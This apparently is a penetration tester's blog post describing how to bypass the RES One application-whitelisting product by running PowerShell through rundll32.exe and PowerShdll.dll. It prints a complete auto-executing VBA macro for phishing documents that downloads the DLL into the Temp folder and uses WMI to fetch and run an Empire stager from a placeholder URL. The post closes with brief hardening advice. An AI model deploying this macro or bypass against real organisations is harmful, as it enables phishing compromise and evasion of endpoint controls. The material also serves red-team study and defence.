Phishing between the App Whitelists

Friday. June 09, 2017 - 2 mins

An increasing number of organisations is moving towards virtual desktop environments. They are often easier to administer and maintain, and provide possibilities for additional security layers. One of those security layers more and more encountered at organisations is the RES One Workspace whitelisting solution. While quite a lot was written lately on bypassing AWL (Application Whitelisting), these techniques are aimed towards bypassing Microsofts AppLocker/Device Guard in Windows 10. A reasonably secure configuration of RES One Workspace blocks execution of all of these Microsoft signed binaries (InstallUtil.exe, regsvcs.exe, regasm.exe, regsvr32.exe) used to run code within their context.

[Using regasm.exe](https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/) to execute dlls blocked by RES One.

RES One also becomes annoying while phishing with Empire, as the execution of the Empire stagers is prevented by RES One, blocking the execution of powershell.exe entirely for that victim user.

However, either by mistake or for the sake of keeping intact certain Windows functionality, rundll.exe is typically whitelisted by administrators. Depending on the type of pentest, rundll can be used to spawn a Command Prompt, using the ReactOS cmd.dll.

Shortcut creation to use cmd.dll via rundll32.exe

Creating the following shortcut to cmd.dll via rundll32.exe yields a pretty functional “Command Prompt”. From there it is oftentimes possible to return to your usual PowerShell environment. Recently, @xP3nt4 created the PowerSdll project which is a more functional alternative to cmd.dll.

cmd.dll command prompt running under the rundll32.exe context

The PowerSdll project also provides a bypass for our phishing issue. We can now create a macro that downloads the PowerShdll.dll for the right architecture, and uses the downloaded dll to execute a PowerShell script (in this case an Empire stager) via rundll.

The VBA script below is a PoC I wrote that spawns an Empire agent in a RES One environment. It downloads the proper PowerShdll.dll corresponding to the system’s architecture to the user’s Temp directory and executes the script at https://127.0.0.1/Empire_default_launcher.ps1 (in this case the output of launcher ListenerName.

Sub AutoOpen() Debugging End Sub Sub Document_Open() Debugging End Sub Public Function Debugging() As Variant DownloadDLL Dim Str As String Str = "C:\Windows\System32\rundll32.exe " & Environ("TEMP") & "\powershdll.dll,main . { iwr -useb https://127.0.0.1/Empire_default_launcher.ps1 } ^| iex;" strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process") errReturn = objProcess.Create(Str, Null, objConfig, intProcessID) End Function Sub DownloadDLL() Dim dll_Loc As String dll_Loc = Environ("TEMP") & "\powershdll.dll" If Not Dir(dll_Loc, vbDirectory) = vbNullString Then Exit Sub End If Dim dll_URL As String #If Win64 Then dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll" #Else dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x86/Release/PowerShdll.dll" #End If Dim WinHttpReq As Object Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0") WinHttpReq.Open "GET", dll_URL, False WinHttpReq.send myURL = WinHttpReq.responseBody If WinHttpReq.Status = 200 Then Set oStream = CreateObject("ADODB.Stream") oStream.Open oStream.Type = 1 oStream.Write WinHttpReq.responseBody oStream.SaveToFile dll_Loc oStream.Close End If End Sub

Running an AWL solution?

Try to blacklist rundll32.exe
Make sure to also include dll's in your AWL. An AWL only checking for executables is not really a (AWL) solution.

Phishing between the App Whitelists

Running an AWL solution?

Related Posts